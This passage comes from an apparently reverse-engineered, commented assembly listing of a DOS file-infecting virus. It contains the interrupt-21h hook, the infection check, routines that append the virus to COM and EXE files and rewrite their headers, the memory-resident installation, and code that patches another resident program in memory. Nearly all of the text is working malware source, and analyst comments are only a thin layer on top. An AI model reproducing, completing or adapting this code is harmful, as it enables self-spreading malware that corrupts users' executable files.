CS:[INFEC_FL] ;POSSIBLE VAL = 00, FF - ;00 OR 00 = 0 ZF SET - ;FF OR FF = FF ZF CLEAR - ;IF FF CONTINUE TO ATTEMPT - ;INFECTION PROCESS - OR AL,AL - POP AX - JNZ CONT - - POPF - JMP GOTO_INT21 ;INFEC_FL = 00 SO LET - ;DOS HANDLE IT - -CONT: - PUSH DS ;SAVE DS = FILE DS - PUSH CS ;SET DS TO CS - POP DS ;TSR INFECTION - - CALL P_030E ; - - MOV WORD PTR [OFFSET C2_INT21],9090 - - CALL P_030E ; - - POP DS ;RESTORE DS TO FILE DS - - PUSH ES ;BP E ; - PUSH DS ;BP C ;SAVE REGS - PUSH BP ;BP A ;THAT MAY BE - PUSH DI - PUSH SI ;BP 8 ; DESTROYED - PUSH DX ;BP 6 ;LATER TO - PUSH CX ;BP 4 ;BE RESTORED - PUSH BX ;BP 2 ;FOR RETURN TI INT 21 - PUSH AX ;BP ; -;BP POINTS AT AX - MOV BP,SP - - PUSH CS ;DS = TSR INFECTION - POP DS ; - - CMP BYTE PTR [REM2],00 ;INFECTED = 00 IF EQUAL - JE J429 ;NOT INFECTED YET - - JMP LEAVE_ - -J429: INC BYTE PTR [COUNTER] - - PUSH [BP+0E] ; - PUSH [BP+06] ; - CALL OPEN_FILE - - LAHF ;LOAD AH WITH FLAGS - ADD SP,+04 ;REMOVE LAST 2 PUSHS - SAHF ;LOAD FLAGS WITH AH - - JNB CHK_FOR_INFEC ;IF NO ERROR - JMP LEAVE_ ;PROBALY ERROR - -CHK_FOR_INFEC: ; J440 - XOR CX,CX ; SET PTR TO START OF - XOR DX,DX ; VICTIM - CALL START_FILE ; - - MOV DX,OFFSET TOP_HOST ;READ 14 BYTES TO - MOV CX,14 ; - CALL READ_FILE ; - JB ALREADY_INFECTED ;ERROR -; USE CHECKSUM TO FIND POSSIBEL WHERE FILE INFECTION OCCURS -; PLACE PTR THERE - - MOV AX,WORD PTR [CHECKSUM] ;CHECKSUM * 10 - MUL WORD PTR [PAGE_16] ;=0010H DX:AX = ORG_SIZE - MOV CX,DX ;MOV RESULTS INTO CX - MOV DX,AX ;DX - CALL START_FILE ;SET POINTER TO A POINT - ;CX:DX FROM START - ;WHICH IN A INFECTED FILE - ;WOULD BE START OF VIRUS -;READ TO THIS LOCATION FORM FILE - - MOV DX,OFFSET TOP_VIR ;READ TO THIS LOCATION - MOV CX,2A ;2A BYTES - CALL READ_FILE ; - JB NOT_INFECTED ;IF ERROR FILE NOT THAT LONG - ; CAN'T BE INFECTED -; NOW COMPARE TO SEE IF FILE IS INFECTED - - CMP WORD PTR [TOP_VIR],7AF4 ; - JNE NOT_INFECTED ;NOT INFECTED GO INFECT - - MOV AX,002C - CMP BYTE PTR [BP+00],00 - JNE J483 - - TEST BYTE PTR [X7],02 ;JUMP IF AN AND OPERATION - JZ J484 ;RESULTS IN ZF SET - -J483: INC AX ; -J484: CMP WORD PTR [TOP_VIR+2],AX ;JUMP IF TOP_VIR+2 => AX - JNB ALREADY_INFECTED ; - -;FILE IS ALREADY INFECTED RESTORE TO ORGINAL FORM - - XOR CX,CX ;SET FILE PTR TO - XOR DX,DX ;ACTUAL START OF - CALL START_FILE ;FILE - - MOV DX,OFFSET TOP_HOST ; - MOV CX,20H ; - CALL WRITE_FILE ; - JB ALREADY_INFECTED ;ERROR - - CALL FORCE_WRITE ; THIS WOULD EFFECTIVELY - ; DISINFECT FILE - JNB J4A4 - -ALREADY_INFECTED: - JMP CLOSE_EXITVIR ; FILE NOW DISINFECTED - -J4A4: MOV CX,WORD PTR [FSIZE1] ;GOTO END OF HOST - MOV DX,WORD PTR [FSIZE2] ; - CALL START_FILE ; - - XOR CX,CX ;WRITE 00 BYTES - CALL WRITE_FILE ;IF ERROR - JB ALREADY_INFECTED ;EXIT - - CALL FORCE_WRITE - JB ALREADY_INFECTED - -;AT THIS TIME THE POSSIBLE INFECTION HAS BEEN REMOVED AND THE FILE RESTORE TO -;ORGIONAL SIZE AND FUNCTION - - JMP CHK_FOR_INFEC ;J440 - -NOT_INFECTED: ;J4BD - MOV AL,02 - MOV CX,0FFFF - MOV DX,0FFF8 - CALL MOV_F_PTR - - MOV DX,OFFSET TOP_HOST ;BUFFER TO READ INTO - MOV CX,08H ;FOR LENGTH - CALL READ_FILE - - JB ERROR_LVE - - CMP WORD PTR [P_COUNT],7AF4 ;IF == MAYBE INFECTED - JE MAKE_SURE ;J4E0 - JMP SHORT INFECT ;J538 - -ERROR_LVE: - JMP CLOSE_EXITVIR ;J6AE - -MAKE_SURE: - CMP BYTE PTR [RELOC],23 ; IF >= - JNB ERROR_LVE ;IT IS INFECTED - - MOV CL,BYTE PTR [RELOC+1] ; ???? - MOV AX,WORD PTR [TOP_HOST] ; POSSIBLE SETING UP JUMP - MOV WORD PTR [FSIZE2],AX ; FOR COM FILE - MOV AX,WORD PTR [P_SIZE] ; - SUB AX,0103H ; WHY 103 - MOV WORD PTR [TOP_HOST+1],AX ; - CMP BYTE PTR [RELOC],09 ; - JA J503 ; - - - MOV CL,0E9 ; - -J503: MOV BYTE PTR [TOP_HOST],CL ;E9= JMP - - XOR CX,CX ; - MOV DX,CX ; - CALL START_FILE ; - - MOV DX,OFFSET TOP_HOST ; - MOV CX,0003H ; - CALL WRITE_FILE ; - JB ERROR_LVE ;J4DD - - CALL FORCE_WRITE - JB ERROR_LVE ;J4DD - - XOR CX,CX ;SET FILE POINTER TO END - MOV DX,WORD PTR [FSIZE2] ;OF HOST FILE - CALL START_FILE ; - XOR CX,CX - CALL WRITE_FILE - JB ERROR_EXIT -;52E - CALL FORCE_WRITE - JB ERROR_EXIT - JMP NOT_INFECTED ;J4BD - -ERROR_EXIT: JMP CLOSE_EXITVIR ;J6AE - -;J538 -INFECT: - MOV WORD PTR [TOP_VIR],7AF4 - MOV WORD PTR [TOP_VIR+2],2C - MOV WORD PTR [TOP_VIR+8],0ABE - - CMP BYTE PTR [BP+00],00 - JNE ERROR_EXIT ;J535 - - TEST BYTE PTR [X7],01 - JE ERROR_EXIT -;THIS NEXT PIECE WILL TELL POINTER TO GO TO END OF FILE -;WITH OFFSET 0:0 WHICH SETS DX:AX TO #BYTES IN ENTIRE FILE -;J557 - MOV AL,02 - XOR CX,CX - MOV DX,CX - CALL MOV_F_PTR - MOV [FSIZE1],DX - MOV [FSIZE2],AX - - XOR CX,CX - MOV DX,CX - CALL START_FILE - - MOV DX,OFFSET TOP_HOST ;BUFFER - MOV CX,20 ;#BYTES TO READ - CALL READ_FILE ; - JB ERROR_EXIT ;J535 - -;CHECK FOR TYPE OF FILE BY TESTING FOR SIGNATURE MZ OR ZM -;IF NEITHER IT IS A COM FILE -;J579 - CMP WORD PTR [TOP_HOST],"ZM" - JE EXE_INFEC - CMP WORD PTR [TOP_HOST],"MZ" - JNE COM_INFEC - -EXE_INFEC: - MOV BYTE PTR [COMFILE],00 - MOV AX,WORD PTR [P_COUNT] ;000E - MUL WORD PTR [EXE_PG_SIZE] ;0066 = 200H - SUB AX,[FSIZE2] ;AX=#BYTES IN HOST - SBB DX,[FSIZE1] ;IF BELOW ERROR SOMEPLACE - JB J5E1 ;J5E1 EXIT ERROR - - MOV AX,WORD PTR [I_SS] ;0018 - MUL WORD PTR [PAGE_16] ;0062 - ADD AX,WORD PTR [I_SP] ;001A - MOV CX,DX ;SAVE RESULT EFF ADDRESS OF - MOV BX,AX ;SS:SP AT START OF PROGRAM - - MOV AX,[H_PARA] ;0012 - MUL WORD PTR [PAGE_16] ;0062 - MOV DI,WORD PTR [FSIZE1] - MOV SI,WORD PTR [FSIZE2] - - ADD SI,+0F - ADC DI,+00 - AND SI,-10 - - SUB SI,AX - SBB DI,DX - - MOV DX,CX - MOV AX,BX - - SUB AX,SI - SBB DX,DI - - JB J5FF -;J5D4 - ADD SI,0DC0 - ADC DI,+00 - SUB BX,SI - SBB CX,DI - - JNB J5FF ;IF NO ERROR - -J5E1: JMP CLOSE_EXITVIR ;J6AE - -COM_INFEC: ;j5E4 - MOV BYTE PTR [COMFILE],01 ; CHECK IF FILE SIZE - CMP WORD PTR [FSIZE1],+00 ; WILL ALLOW INFECTION - JNZ J5E1 ; - CMP WORD PTR [FSIZE2],+20 ; - JBE J5E1 ; - CMP WORD PTR [FSIZE2],0F277 ; - JNB J5E1 ; - -J5FF: - MOV CX,WORD PTR [FSIZE1] ; FIGURE END OF FILE - MOV DX,WORD PTR [FSIZE2] ; +DATA NEEDED TO GET IT TO - ADD DX,+0F ;A EVEN PAGE IE DIVISIBLE BY 10H - ADC CX,+00 ; - AND DX,-10 ; - CALL START_FILE ; - - XOR DX,DX - MOV CX,0B41 ;OFFSET TOP_VIRUS -OFFSET BOT_VIRUS+1 - PUSH word ptr [x7] - MOV BYTE PTR [x7],01 - CALL WRITE_FILE - POP CX - MOV BYTE PTR [x7],CL - JB J5E1 - - CMP BYTE PTR [COMFILE],00 - JE EXEINFEC ;J638 - - MOV CX,0004 ; WRITES FIRST 4 BYTES - CALL WRITE_FILE ; TO END OF FILE - -EXEINFEC: - CALL FORCE_WRITE ; FA 7A 2C 00 - - JB J5E1 - - MOV DX,WORD PTR [FSIZE1] - MOV AX,[FSIZE2] - ADD AX,000F - ADC DX,+00 - AND AX,0FFF0 - DIV WORD PTR [PAGE_16] - MOV WORD PTR[CHECKSUM],AX - CMP BYTE PTR [COMFILE],00 - JE EXEONLY -;DO THIS TO COM FILE ONLY - MUL WORD PTR [PAGE_16] - MOV BYTE PTR [TOP_HOST],0E9 - ADD AX,07CE - MOV [TOP_HOST+1],AX - JMP SHORT J069E - -EXEONLY: ;66C - MOV [I_CS],AX - MOV WORD PTR [I_IP],07D1 ;OFFSET START - MUL WORD PTR [PAGE_16] - ADD AX,OFFSET VGROUP:BOT_VIR ;B40 - ADC DX,+00 - DIV WORD PTR [EXE_PG_SIZE] - INC AX - MOV WORD PTR [P_COUNT],AX - MOV WORD PTR [P_SIZE],DX - MOV AX,WORD PTR [H_PARA] - SUB WORD PTR [I_CS],AX - -;J692: SET MIN_MALLOC - - MOV SI,OFFSET MINALLOC - CALL P_MIN_MAX_ALLOC - - MOV SI,OFFSET MAXALLOC - CALL P_MIN_MAX_ALLOC - -J069E: XOR CX,CX - MOV DX,CX - CALL START_FILE - - MOV DX,OFFSET TOP_HOST - MOV CX,20 - CALL WRITE_FILE - -CLOSE_EXITVIR: ;J6AE - PUSH [BP+0E] - PUSH [BP+06] - CALL CLOSE_F - -;J6B7 - ADD SP,+04 ;REMOVE LAST 2 PUSH -LEAVE_: - MOV BYTE PTR [INFEC_FL],0FF - POP AX - POP BX - POP CX - POP DX - POP SI - POP DI - POP BP - POP DS - POP ES - POPF - -GOTO_INT21: ;J6C9 - PUSHF - PUSH CS ; FLAG <- BP +6 - PUSH WORD PTR CS:[C_OFFSET_21] ; CS <- BP +4 - CMP BYTE PTR CS:[REM2],00 ; IP <- BP +2 - JNE J6D9 ; OLDBP <- BP =SP - IRET ; -J6D9: PUSH BP - MOV BP,SP - OR WORD PTR [BP+06],0100 ;SETS TRAP FLAG ON - ;RETURN - MOV BYTE PTR CS:[REM2],00 - POP BP - IRET -VIR_INT_21 ENDP - - ; C -OPEN_FILE PROC ; A - PUSH BP ; FLAG 8 - MOV BP,SP ; CS 6 - PUSH ES ; IP 4 - PUSH DX ; BP 2 - PUSH CX ;BP-> - PUSH BX - PUSH AX - - MOV AX,3300 ;GET EXT CTRL-BREAK - CALL C2_INT21 ;P361 - MOV BYTE PTR [CTRL_FLAG],DL ;SAVE OLD SETTING - - MOV AX,3301 ;SET CTRL-BREAK - XOR DL,DL ;OFF - CALL C2_INT21 - - MOV AX,3524 ;GET INT 24 - CALL C2_INT21 ;VECTORS - MOV WORD PTR [OLD_INT24_SEG],ES ;SAVE THEM HERE - MOV WORD PTR [OLD_INT24_OFS],BX ; - - MOV DX,OFFSET VIR_INT24 ;J384 - MOV AX,2524 ;SET INT 24 - CALL C2_INT21 ;TO OUR HANDLER - - MOV AX,4300 ;GET THE FILE ATTRIBUTES - PUSH DS ; - LDS DX,[BP+04] ;PTR TO FILENAME - CALL C2_INT21 ; - POP DS ; - JB GET_OUT_F_CL ;PROB_CH - MOV BYTE PTR [F_ATTR],CL ; - - TEST CL,01 ;TEST FOR R_W - JZ NOCHANGE_ATTR ; ITS R_W IF EQUAL - MOV AX,4301 ;CHANGE F_ATTR - push ds - XOR CX,CX ; - LDS DX,[BP+04] ; - CALL C2_INT21 ; - POP DS ; -PROB_CH: - JB GET_OUT_F_CL ; - -NOCHANGE_ATTR: - MOV AX,3D02 ;OPEN FILE R_W - PUSH DS ; - LDS DX,[BP+04] ;FNAME PTR - CALL C2_INT21 - POP DS - JB J0780 -;J74C - MOV WORD PTR [F_HANDLE],AX ; - MOV AX,5700 ;GET FILE TIME DATE - CALL I21_F_HANDLE ; - MOV WORD PTR [F_TIME],CX - MOV WORD PTR [F_DATE],DX - - POP AX - POP BX - POP CX - POP DX - POP ES - POP BP - CLC - RET -OPEN_FILE ENDP ;764 - -CLOSE_F PROC - PUSH BP - MOV BP,SP - PUSH ES - PUSH DX - PUSH CX - PUSH BX - PUSH AX - - MOV CX,WORD PTR [F_TIME] ; RESTORE - MOV DX,WORD PTR [F_DATE] ; TIME AND DATE - MOV AX,5701 ; TO FILE - CALL I21_F_HANDLE - - MOV AH,3E - CALL I21_F_HANDLE ;****************** - -J0780: MOV CL,BYTE PTR [F_ATTR] - XOR CL,20 - AND CL,3F - TEST CL,21 - JZ GET_OUT_F_CL ;J7A0 - - MOV AX,4301 - PUSH DS - XOR CH,CH - MOV CL,BYTE PTR [F_ATTR] - LDS DX,[BP+04] ;ASCIZ FILENAME - CALL C2_INT21 ;J361************* - POP DS - -GET_OUT_F_CL: - MOV AX,2524 - PUSH DS - LDS DX,DWORD PTR [OLD_INT24_OFS] - CALL C2_INT21 - POP DS - - MOV DL,BYTE PTR [CTRL_FLAG] - MOV AX,3301 - CALL C2_INT21 - - POP AX - POP BX - POP CX - POP DX - POP ES - POP BP - STC - RET -CLOSE_F ENDP - -RET_HOST PROC - POP CX - MOV DX,0200 - CMP BYTE PTR CS:[BX+REM2],00 - JE J7CC - MOV DH,03 - -J7CC: PUSH DX - PUSH CS - PUSH CX - INC BX - IRET -RET_HOST ENDP - -;07d1 -START: - CALL FIND_OFFSET - -FIND_OFFSET: - POP BX - SUB BX,OFFSET FIND_OFFSET - - MOV BYTE PTR CS:[BX+INFEC_FL],0FF ;D005C - CLD - CMP BYTE PTR CS:[BX+COMFILE],00 - JE EXEFILE ;J800 - -;ONLY OCCURS IF IT IS A COM FILE - MOV SI,OFFSET TOP_HOST ;MOV 20H BYTES FROM - ADD SI,BX ; [SI] TO - MOV DI,0100 ; [DI] - MOV CX,0020 ; - REPZ MOVSB - - PUSH CS - PUSH WORD PTR CS:[BX+HOST_IP] - - PUSH ES - PUSH DS - PUSH AX - JMP short INSTALLED? - -EXEFILE: -;NOTICE NO BX+ OFFSET NEEDED BECAUSE IT ASSUMES IT IS EXE AT THIS -;MOMENT - MOV DX,DS - ADD DX,+10 - ADD DX,WORD PTR CS:[I_CS] - PUSH DX - - PUSH word ptr cs:[I_IP] - - PUSH ES - PUSH DS - PUSH AX - -INSTALLED?: - PUSH BX - MOV BX,002C - CLC - MOV AX,0C603 - INT 21 - POP BX - JNB NOT_INSTALLED ;J0827 - -EXIT: - POP AX - POP DS - POP ES - CALL RET_HOST ;P_07BE - RETF -;J0827 -NOT_INSTALLED: - - CMP BYTE PTR cs:[BX+COMFILE],00 - JE FILE_IS_EXE ;J0834 - CMP SP,-10 - JB EXIT ;J0820 - -FILE_IS_EXE: - MOV AX,DS ;LOOK AT MCB - DEC AX ; - MOV ES,AX ; - CMP BYTE PTR ES:[0000],5A ; IS IT Z - JE LAST_MEM_BLOCK ;YES IT IS LAST ONE - - PUSH BX - MOV AH,48 ;REQUEST A BLOCK OF MEM - MOV BX,0FFFF ;LARGEST AVAILABLE - INT 21 - - CMP BX,00BC ;IS BLOCK > BC - JB TO_SMALL ;J0853 - - MOV AH,48 ;AVAIBLE BLOCK IS BIG ENOUGH - INT 21 ; GET IT IN AX - -TO_SMALL: - POP BX - JB EXIT - - DEC AX ;GET MCB SEGMENT IN ES - MOV ES,AX ; - CLI - MOV WORD PTR ES:[0001],0000 ;MARK THIS BLOCK AS FREE - CMP BYTE PTR ES:[0000],5A ; IS LAST MCB - JNE EXIT - - ADD AX,WORD PTR ES:[0003] ;SIZE OF MEM MCB CONTROLS - INC AX ; - MOV WORD PTR ES:[0012],AX ;0012 PTS TO NEXT MCB - -LAST_MEM_BLOCK: - MOV AX,WORD PTR ES:[0003] ;SIZE OF MEM - SUB AX,00BC ;MINUS SIZE VIRUS/10H - JB EXIT ; - - MOV WORD PTR ES:[0003],AX - SUB WORD PTR ES:[0012],00BC - MOV ES,ES:[0012] ;SEG TO LOAD VIRUS INTO - XOR DI,DI ;MOV B40 BYTES FROM - MOV SI,BX ; DS:[SI] - ; TO ES:[DI] - MOV CX,OFFSET VGROUP:BOT_VIR ;0B40 - - DB 0F3, 2E,0A4 -; REPZ CS: MOVSB ; - - PUSH ES - POP DS - PUSH BX - -;J0899 -;NOTE THAT DS:= ES MEANS LOCATION IN HIGH MEM BELOW 640 -;SO THAT IF CS IS REFRENCED YOU MUST STILL USE OFFSET -;BUT IF DS IS USED OFFSET CAN NOT BE USED - - MOV AX,3521 - INT 21 - MOV [OLD_INT21_SEG],ES - MOV [OLD_INT21_OFS],BX - - MOV [OLD_INT21_SEG2],ES - MOV [OLD_INT21_OFS2],BX - - MOV AX,3501 ;GET VECTOR FOR - INT 21 ;INTERUPT 01 - MOV SI,BX ;SAVE IN REGS - MOV DI,ES ;DS:SI - - MOV AX,351C - INT 21 - MOV [OLD_INT1C_SEG],ES - MOV [OLD_INT1C_OFS],BX - - POP BX - - MOV AX,2521 - MOV DX,OFFSET VIR_INT_21 - INT 21 - - MOV AX,2501 - MOV DX,OFFSET VIR_INT_01 - INT 21 - - MOV DX,OFFSET VIR_INT_1C - - PUSHF - MOV AX,BX ;PUT OFFSET IN AX - ADD AX,OFFSET VACSINE ;SET UP TO GO HERE - PUSH CS ;USING STACK - - PUSH AX ;SAVE OFFSET - - CLI ;CLEAR INTER FLAGS - PUSHF ;PUSH FLAGS - POP AX ;POP FLAG - OR AX,0100 ;SET TF - PUSH AX ;FOR SINGLE STEP - - MOV AX,BX - ADD AX,OFFSET REAL_INT21 ;FLAGS SET FOR SINGLE STEP - PUSH CS ;CS - PUSH AX ;IP TO REAL_INT21 - MOV AX,251C ;WHEN INT 21 CALLED - ;HOOK 1C - MOV BYTE PTR [SNARE],01 - IRET - -VIR_INT_01 PROC - PUSH BP - MOV BP,SP - CMP BYTE PTR CS:[SNARE],01 ;IF SNARE IS SET - JE YES_NO ;CONTINUE - -EXIT_VIR_INT01: - AND WORD PTR [BP+06],0FEFF ;CLEAR TF - MOV BYTE PTR cs:[SNARE],00 ;CLEAR SNARE - POP BP ; - IRET ; - -YES_NO: CMP WORD PTR [BP+04],0300 ; - JB GOT_IT ;J0918 - POP BP ;NOPE - IRET ;TRY AGAIN - -GOT_IT: - PUSH BX - MOV BX,[BP+02] - MOV WORD PTR CS:[OLD_INT21_OFS2],BX - MOV BX,[BP+04] - MOV WORD PTR CS:[OLD_INT21_SEG2],BX - POP BX - JMP EXIT_VIR_INT01 - -VIR_INT_01 ENDP - -VACSINE: - MOV BYTE PTR [SNARE],00 - - MOV AX,2501 ;RESTORE - MOV DX,SI ;INT 01 - MOV DS,DI ; - INT 21 ; - -;NEXT PIECE OF CODE IS LOOKING AT DS:=0000 -;0000:00C5 MIGHT BE A JUMP TO AN INT BEING ALTERED AT TABLE -;0000:00C7 -;0000:0413 MEM SIZE IN KILOBYTES - - XOR AX,AX - MOV DS,AX - MOV WORD PTR DS:[00C5],397F - MOV BYTE PTR DS:[00C7],2C - MOV AX,WORD PTR DS:[MEM_SIZE] - MOV CL,06 - SHL AX,CL - MOV DS,AX - MOV SI,012E - XOR AX,AX - MOV CX,0061 - -L1: ADD AX,[SI] - ADD SI,+02 - LOOP L1 - - CMP AX,053BH - JE PING_IN_MEM ;J0969 - JMP EXIT ;J0820 - -PING_IN_MEM: - CLI - MOV BYTE PTR DS:[017AH],01H - MOV BYTE PTR DS:[01FBH],01H - MOV BYTE PTR DS:[0093H],0E9H - MOV WORD PTR DS:[0094H],0341H - - PUSH DS - POP ES - - PUSH CS - POP DS - - MOV SI,BX ;STILL = OFFSET - ADD SI,OFFSET NEW_PONG - MOV DI,03D7 - MOV CX,0027 - REPZ MOVSB - STI - JMP EXIT - -P_0995 PROC -;CALLED BY P_09C8 -; - PUSH BP - MOV BP,SP - PUSH CX - MOV AX,8000 - XOR CX,CX - -PLOOP: - TEST AX,[BP+08] - JNE J09A8 - INC CX - SHR AX,1 - JMP short PLOOP -J09A8: - XOR AX,[BP+08] - JE J09BC - - MOV AX,[BP+04] - ADD AX,[BP+08] - ADD AX,CX - SUB AX,0011 - CLC - POP CX - POP BP - RET -J09BC: - MOV AX,000F - SUB AX,CX - ADD AX,[BP+06] - STC - POP CX - POP BP - RET -P_0995 ENDP -;******************************************************************** - -P_09C8 PROC -;CALLED BY P_02D8 - PUSH BP - MOV BP,SP - SUB SP,+10 ;ADD BACK SP 5 WORDS - - MOV DX,8000 -L21: TEST DX,[BP+08] - JNZ J09DA - SHR DX,1 - JMP L21 - -J09DA: - LEA DI,[BP-10] ; - MOV CX,0008 ; - XOR AX,AX ; - PUSH SS ;SS = ES - POP ES ; - REPZ STOSW ;MOV 8 WORDS FROM - ;MOV DS:SI - ;TO ES:DI - MOV CX,[BP+08] - -J09E9: TEST CX,DX - JE J0A4B - - PUSH CX - PUSH [BP+06] - PUSH [BP+04] - CALL P_0995 - - MOV ES,AX - LAHF - ADD SP,+06 - SAHF - JB J0A3A - -;0A00 - MOV AX,WORD PTR ES:[0000] ; - XOR [BP-10],AX ; - ; - MOV AX,WORD PTR ES:[0002] ; - XOR [BP-0E],AX ; - ; - MOV AX,WORD PTR ES:[0004] ; - XOR [BP-0C],AX ; - ; - MOV AX,WORD PTR ES:[0006] ; - XOR [BP-0A],AX ; - ; - MOV AX,WORD PTR ES:[0008] ; - XOR [BP-08],AX ; - ; - MOV AX,WORD PTR ES:[000A] ; - XOR [BP-06],AX ; - ; - MOV AX,WORD PTR ES:[000C] ; - XOR [BP-04],AX ; - ; - MOV AX,WORD PTR ES:[000E] ; - XOR [BP-02],AX ; - ; - JMP SHORT J0A4B - -J0A3A: - MOV AX,CX - MOV CX,0008 - LEA SI,[BP-10] - XOR DI,DI - - DB 0F3,36,0A5 -; REPZ SS:MOVSW - - MOV CX,AX - JMP SHORT J0A4E - -J0A4B: - DEC CX - JMP SHORT J09E9 - -J0A4E: - SHR DX,1 - JB J0A54 - JMP SHORT J09DA - -J0A54: - MOV SP,BP - POP BP - RET -P_09C8 ENDP - -;***************************************************************** - -P_0A58 PROC - PUSH BP - MOV BP,SP - PUSH DS - -J0A5C: - MOV DS,[BP+04] - MOV ES,[BP+06] - XOR BX,BX - -J0A64: - MOV AX,WORD PTR ES:[BX] - XOR WORD PTR [BX],AX - ADD BX,+02 - CMP BX,+10 - JB J0A64 - INC WORD PTR [BP+04] - INC WORD PTR [BP+06] - DEC WORD PTR [BP+08] - JNZ J0A5C - - POP DS - POP BP - RET -P_0A58 ENDP -;************************************************************ - -P_0A7F PROC - PUSH BP - MOV BP,SP - PUSH DS - MOV BL,01 -J0A85: - XOR SI,SI -J0A87: - XOR CX,CX - MOV DI,[BP+08] - ADD DI,[BP+0A] - DEC DI - -J0A90: - MOV DS,DI - SHR BYTE PTR [SI],1 - RCL CX,1 - DEC DI - CMP DI,[BP+08] - JNB J0A90 - OR CX,CX - JZ J0AB1 - - PUSH CX - PUSH [BP+06] - PUSH [BP+04] - CALL P_0995 - - ADD SP,+06 ; - MOV DS,AX - XOR BYTE PTR [SI],BL -J0AB1: - INC SI - CMP SI,+10 - JB J0A87 - SHL BL,01 - JNB J0A85 - POP DS - POP BP - RET -P_0A7F ENDP - -J0ABE DB 87,0DBH -;J0AC0 DB 88,CB ;VALUE MAYBE USED AS 0ACO - - -J0AC0: DB 88,0CBH,8A,99,8F,38 - DB 0E7H,0CDH,0A1H,9BH,3EH - DB 0EF,86,0C8,97,83,52 - DB 34,0BE,8C,21, 29,0B1 - DB 0F9H,0C1H,9BH,12H,04H,09H,0F3H - DB 45, 01, 93, 01DH, 0B0 - DB 0B9,0C6,01,06,92,37,50 - DB 49,0E8,0D5,71,97 - DB 22,0A6,0E6,04C,50 - DB 0BE,2A,23 - DB 0BE,44, 01DH - DB 0A1,0A6,6BH - DB 0A0,0E0,06 - DB 0AA,1A,0F6,2A,0C0 - DB 02,2F,75,99 - DB 06H,0FH,5BH,97H,02H,3EH - DB 64, 07DH, 0C8,50,66,08 - DB 0C4,0FA,92,8E,64,75 - DB 1BH, 0A6H, 1BH, 0B9H, 32H, 0BDH - DB 0BH, 3EH, 61H, 06DH, 0E0H, 0C4H - DB 0B9H, 29, 0CAH, 9CH, 17H, 08H, 21H - DB 0EAH, 0EEH, 7EH , 85H, 0B1H - DB 63H, 2AH, 0C3H, 71H, 71H, 2CH, 0A0H - DB 0F2H, 8BH, 59H, 0DH - DB 0F9,0D5H, 00H -;POSSIBLE END OF VIRUS - - -BOT_VIR EQU $ ;LABEL FOR END OF VIRUS -VIRUS_CODE ENDS - END start - - - - -